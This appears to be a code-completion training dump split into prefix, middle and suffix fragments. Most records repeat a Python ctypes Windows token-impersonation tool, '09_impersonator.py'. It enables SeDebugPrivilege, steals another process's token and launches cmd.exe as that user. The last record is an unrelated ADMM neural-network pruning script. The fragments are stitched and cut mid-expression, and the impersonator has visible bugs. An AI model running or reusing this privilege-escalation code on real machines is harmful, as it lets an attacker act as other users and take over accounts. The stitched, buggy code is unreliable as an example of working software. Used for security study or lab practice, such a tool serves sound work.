dwDesiredAccess = TOKEN_ALL_ACCESS
lpTokenAttributes = SECURITY_ATTRIBUTES()
ImpersonationLevel = 2 # Set to SecurityImpersonation Enum
TokenType = 1 # Set to Token_Type enum as Primary
# Configure the SECURITY_ATTRIBUTES Structure
lpTokenAttributes.bInheritHandle = False
lpTokenAttributes.lpSecurityDescriptor = ctypes.c_void_p()
lpTokenAttributes.nLength = ctypes.sizeof(lpTokenAttributes)
print("[INFO] Duplicating Token on Hooked Process...")
# Issue the Token Duplication Call
response = a_handle.DuplicateTokenEx(
TokenHandle,
dwDesiredAccess,
ctypes.byref(lpTokenAttributes),
ImpersonationLevel,
TokenType,
ctypes.byref(hExistingToken))
if response == 0:
print("[ERROR] Duplicating Token Failed [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
# Spawn a Process as the Impersonated User
# CreateProcessWithTokenW
hToken = hExistingToken
dwLogonFlags = 0x00000001 # Use the Flag LOGON_WITH_PROFILE
lpApplicationName = "C:\\Windows\\System32\\cmd.exe"
lpCommandLine = None
dwCreationFlags = 0x00000010 # Use the Flag CREATE_NEW_CONSOLE
lpEnvironment = ctypes.c_void_p()
lpCurrentDirectory = None
lpStartupInfo = STARTUPINFO()
lpProcessInformation = PROCESS_INFORMATION()
# StartupInfo (*If I don't sepcify the value, it will return as NULL)
lpStartupInfo.wShowWindow = 0x1 # Showing up Windows
lpStartupInfo.dwFlags = 0x1 # Use to flag to look at wShowWindow
lpStartupInfo.cb = ctypes.sizeof(lpStartupInfo)
response = a_handle.CreateProcessWithTokenW(
hToken,
dwLogonFlags,
lpApplicationName,
lpCommandLine,
dwCreationFlags,
lpEnvironment,
lpCurrentDirectory,
ctypes.byref(lpStartupInfo), # Pointer to STARTUPINFOA
ctypes.byref(lpProcessInformation)) # Pointer to PROCESS_INFORMATION
if response == 0:
print("[ERROR] Failed to Create a Process with Duplicated Token [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Created Impersonated Process!")
| print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1 | conditional_block |
09_impersonator.py | # impersonator.py
import ctypes
from ctypes.wintypes import DWORD,BOOL,HANDLE,LPWSTR,WORD,LPBYTE
# Handles
u_handle = ctypes.WinDLL("user32.dll")
k_handle = ctypes.WinDLL("kernel32.dll")
a_handle = ctypes.WinDLL("Advapi32.dll")
# Access Rights (Full Access Right Shortcut)
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# Privilege Enabled Mask
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_READ = 0x00020000
TOKEN_ASSIGN_PRIMARY = 0x0001
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATION = 0x0004
TOKEN_QUERY = 0x0008
TOKEN_QUERY_SOURCE = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY | | TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebugPrivilege on Current Process to be able to use token duplication
print("[INFO] Enabling SEDebugPrivilege on Current Process...")
response = enablePrivilege("SEDebugPrivilege", currentProcessHandle)
if response != 0:
print("[ERROR] Failed to Enable Privileges!")
exit(1)
# Duplicate Token On Hooked Process
hExistingToken = ctypes.c_void_p()
dwDesiredAccess = TOKEN_ALL_ACCESS
lpTokenAttributes = SECURITY_ATTRIBUTES()
ImpersonationLevel = 2 # Set to SecurityImpersonation Enum
TokenType = 1 # Set to Token_Type enum as Primary
# Configure the SECURITY_ATTRIBUTES Structure
lpTokenAttributes.bInheritHandle = False
lpTokenAttributes.lpSecurityDescriptor = ctypes.c_void_p()
lpTokenAttributes.nLength = ctypes.sizeof(lpTokenAttributes)
print("[INFO] Duplicating Token on Hooked Process...")
# Issue the Token Duplication Call
response = a_handle.DuplicateTokenEx(
TokenHandle,
dwDesiredAccess,
ctypes.byref(lpTokenAttributes),
ImpersonationLevel,
TokenType,
ctypes.byref(hExistingToken))
if response == 0:
print("[ERROR] Duplicating Token Failed [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
# Spawn a Process as the Impersonated User
# CreateProcessWithTokenW
hToken = hExistingToken
dwLogonFlags = 0x00000001 # Use the Flag LOGON_WITH_PROFILE
lpApplicationName = "C:\\Windows\\System32\\cmd.exe"
lpCommandLine = None
dwCreationFlags = 0x00000010 # Use the Flag CREATE_NEW_CONSOLE
lpEnvironment = ctypes.c_void_p()
lpCurrentDirectory = None
lpStartupInfo = STARTUPINFO()
lpProcessInformation = PROCESS_INFORMATION()
# StartupInfo (*If I don't sepcify the value, it will return as NULL)
lpStartupInfo.wShowWindow = 0x1 # Showing up Windows
lpStartupInfo.dwFlags = 0x1 # Use to flag to look at wShowWindow
lpStartupInfo.cb = ctypes.sizeof(lpStartupInfo)
response = a_handle.CreateProcessWithTokenW(
hToken,
dwLogonFlags,
lpApplicationName,
lpCommandLine,
dwCreationFlags,
lpEnvironment,
lpCurrentDirectory,
ctypes.byref(lpStartupInfo), # Pointer to STARTUPINFOA
ctypes.byref(lpProcessInformation)) # Pointer to PROCESS_INFORMATION
if response == 0:
print("[ERROR] Failed to Create a Process with Duplicated Token [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Created Impersonated Process!") | TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE | | random_line_split |
09_impersonator.py | # impersonator.py
import ctypes
from ctypes.wintypes import DWORD,BOOL,HANDLE,LPWSTR,WORD,LPBYTE
# Handles
u_handle = ctypes.WinDLL("user32.dll")
k_handle = ctypes.WinDLL("kernel32.dll")
a_handle = ctypes.WinDLL("Advapi32.dll")
# Access Rights (Full Access Right Shortcut)
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# Privilege Enabled Mask
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_READ = 0x00020000
TOKEN_ASSIGN_PRIMARY = 0x0001
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATION = 0x0004
TOKEN_QUERY = 0x0008
TOKEN_QUERY_SOURCE = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
|
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebugPrivilege on Current Process to be able to use token duplication
print("[INFO] Enabling SEDebugPrivilege on Current Process...")
response = enablePrivilege("SEDebugPrivilege", currentProcessHandle)
if response != 0:
print("[ERROR] Failed to Enable Privileges!")
exit(1)
# Duplicate Token On Hooked Process
hExistingToken = ctypes.c_void_p()
dwDesiredAccess = TOKEN_ALL_ACCESS
lpTokenAttributes = SECURITY_ATTRIBUTES()
ImpersonationLevel = 2 # Set to SecurityImpersonation Enum
TokenType = 1 # Set to Token_Type enum as Primary
# Configure the SECURITY_ATTRIBUTES Structure
lpTokenAttributes.bInheritHandle = False
lpTokenAttributes.lpSecurityDescriptor = ctypes.c_void_p()
lpTokenAttributes.nLength = ctypes.sizeof(lpTokenAttributes)
print("[INFO] Duplicating Token on Hooked Process...")
# Issue the Token Duplication Call
response = a_handle.DuplicateTokenEx(
TokenHandle,
dwDesiredAccess,
ctypes.byref(lpTokenAttributes),
ImpersonationLevel,
TokenType,
ctypes.byref(hExistingToken))
if response == 0:
print("[ERROR] Duplicating Token Failed [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
# Spawn a Process as the Impersonated User
# CreateProcessWithTokenW
hToken = hExistingToken
dwLogonFlags = 0x00000001 # Use the Flag LOGON_WITH_PROFILE
lpApplicationName = "C:\\Windows\\System32\\cmd.exe"
lpCommandLine = None
dwCreationFlags = 0x00000010 # Use the Flag CREATE_NEW_CONSOLE
lpEnvironment = ctypes.c_void_p()
lpCurrentDirectory = None
lpStartupInfo = STARTUPINFO()
lpProcessInformation = PROCESS_INFORMATION()
# StartupInfo (*If I don't sepcify the value, it will return as NULL)
lpStartupInfo.wShowWindow = 0x1 # Showing up Windows
lpStartupInfo.dwFlags = 0x1 # Use to flag to look at wShowWindow
lpStartupInfo.cb = ctypes.sizeof(lpStartupInfo)
response = a_handle.CreateProcessWithTokenW(
hToken,
dwLogonFlags,
lpApplicationName,
lpCommandLine,
dwCreationFlags,
lpEnvironment,
lpCurrentDirectory,
ctypes.byref(lpStartupInfo), # Pointer to STARTUPINFOA
ctypes.byref(lpProcessInformation)) # Pointer to PROCESS_INFORMATION
if response == 0:
print("[ERROR] Failed to Create a Process with Duplicated Token [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Created Impersonated Process!")
| _fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
] | identifier_body |
main.py | from __future__ import print_function
import os
import sys
import logging
import argparse
import time
from time import strftime
import torch
import torch.optim as optim
from torchvision import datasets, transforms
from models.resnet_1d import ResNet18_1d, ResNet34_1d, ResNet50_1d
import admm
from admm import GradualWarmupScheduler
from admm import CrossEntropyLossMaybeSmooth
from admm import mixup_data, mixup_criterion
from testers import *
from TrainValTest import TrainValTest
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def check_and_create(dir_path):
if os.path.exists(dir_path):
return True
else:
os.makedirs(dir_path)
return False
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 admm training')
parser.add_argument('--logger', action='store_true', default=True,
help='whether to use logger')
parser.add_argument('--arch', type=str, default=None,
help='[vgg, resnet, convnet, alexnet]')
parser.add_argument('--depth', default=None, type=int,
help='depth of the neural network, 16,19 for vgg; 18, 50 for resnet')
parser.add_argument('--s', type=float, default=0.0001,
help='scale sparse rate (default: 0.0001)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--multi-gpu', action='store_true', default=False,
help='for multi-gpu training')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--admm-epochs', type=int, default=1, metavar='N',
help='number of interval epochs to update admm (default: 1)')
parser.add_argument('--optmzr', type=str, default='sgd', metavar='OPTMZR',
help='optimizer used (default: adam)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--lr-decay', type=int, default=30, metavar='LR_decay',
help='how many every epoch before lr drop (default: 30)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--load-model', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--load-mask', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--save-model', type=str, default="",
help='For Saving the current Model')
parser.add_argument('--masked-retrain', action='store_true', default=False,
help='for masked retrain')
parser.add_argument('--verbose', action='store_true', default=True,
help='whether to report admm convergence condition')
parser.add_argument('--admm', action='store_true', default=False,
help="for admm training")
parser.add_argument('--rho', type=float, default = 0.0001,
help ="define rho for ADMM")
parser.add_argument('--rho-num', type=int, default = 5,
help ="define how many rohs for ADMM training")
parser.add_argument('--sparsity-type', type=str, default='random-pattern',
help ="define sparsity_type: [irregular,column,filter,pattern,random-pattern]")
parser.add_argument('--config-file', type=str, default='config_vgg16',
help ="config file name")
parser.add_argument('--combine-progressive', default=False, type=str2bool,
help="for filter pruning after column pruning")
parser.add_argument('--purification', default=False, type=str2bool,
help="purification after pruning")
parser.add_argument('--lr-scheduler', type=str, default='default',
help='define lr scheduler')
parser.add_argument('--warmup', action='store_true', default=False,
help='warm-up scheduler')
parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='M',
help='warmup-lr, smaller than original lr')
parser.add_argument('--warmup-epochs', type=int, default=0, metavar='M',
help='number of epochs for lr warmup')
parser.add_argument('--mixup', action='store_true', default=False,
help='ce mixup')
parser.add_argument('--alpha', type=float, default=0.0, metavar='M',
help='for mixup training, lambda = Beta(alpha, alpha) distribution. Set to 0.0 to disable')
parser.add_argument('--smooth', action='store_true', default=False,
help='lable smooth')
parser.add_argument('--smooth-eps', type=float, default=0.0, metavar='M',
help='smoothing rate [0.0, 1.0], set to 0.0 to disable')
parser.add_argument('--no-tricks', action='store_true', default=False,
help='disable all training tricks and restore original classic training process')
########### From RFMLS: multi-gpu; batch-size
parser.add_argument('--exp_name', default='exp1', type=str, help='Specify the experiment name')
parser.add_argument('--base_path', default='/scratch/RFMLS/dataset100/dataset_with_val_9000train/', type=str, help='Specify the base path')
parser.add_argument('--save_path', default='/scratch/zhou.fan1/filtered/', type=str, help='Specify the save path')
parser.add_argument('--file_type', default='mat', type=str, help='Specify type of file you want to read')
parser.add_argument('--decimated', default=False, type=str2bool, help='Specify if the data in the files is decimated, if so and you are using the same stats file as the undecimated then the generator will take this into account')
parser.add_argument('--val_from_train', default=False, type=str2bool, help='If validation not present in partition file, generate one from the training set. (If false, use test set as validation)')
parser.add_argument('--test_on_val_set',default=False, type=str2bool, help='If true it will test the trained model on validation data, for tuning hyperparameters')
parser.add_argument('--train', default=False, type=str2bool, help='Specify doing training or not')
parser.add_argument('-ss', '--slice_size', default=1024, type=int, help='Specify the slice size')
parser.add_argument('-d', '--devices', default=100, type=int, help='Specify the number of total devices')
parser.add_argument('--cnn_stack', default=3, type=int, help='[Baseline Model] Specify the number of cnn layers')
parser.add_argument('--fc_stack', default=2, type=int, help='[Baseline Model] Specify the number of fc layers')
parser.add_argument('--channels', default=128, type=int, help='[Baseline Model] Specify the number of channels of cnn')
parser.add_argument('--fc1', default=256, type=int, help='[Baseline Model] Specify the number of neurons in the first fc layer')
parser.add_argument('--fc2', default=128, type=int, help='[Baseline Model] Specify the number of neurons in the penultimate fc layer')
# Data Generator
parser.add_argument('--generator', default='new', type=str, help='Specify which generator to use')
parser.add_argument('--add_padding', default=False, type=str2bool, help='If examples are smaller than slice size addpadding')
parser.add_argument('--padding_type', default='zero', type=str, help='"zero"-padding and "stride"-padding')
parser.add_argument('--try_concat', default=False, type=str2bool, help='If examples are smaller than slice size and using demodulated data, try and concat them')
parser.add_argument('--preprocessor', default='no', type=str, help='Specify which preprocessor to use')
parser.add_argument('--K', default=1, type=int, help='Specify the batch down sampling factor K')
parser.add_argument('-fpio', '--files_per_IO', default=500000, type = int, help='Specify the files loaded to memory per IO')
parser.add_argument('--shrink', default=1, type=float, help='Dataset down sampling factor')
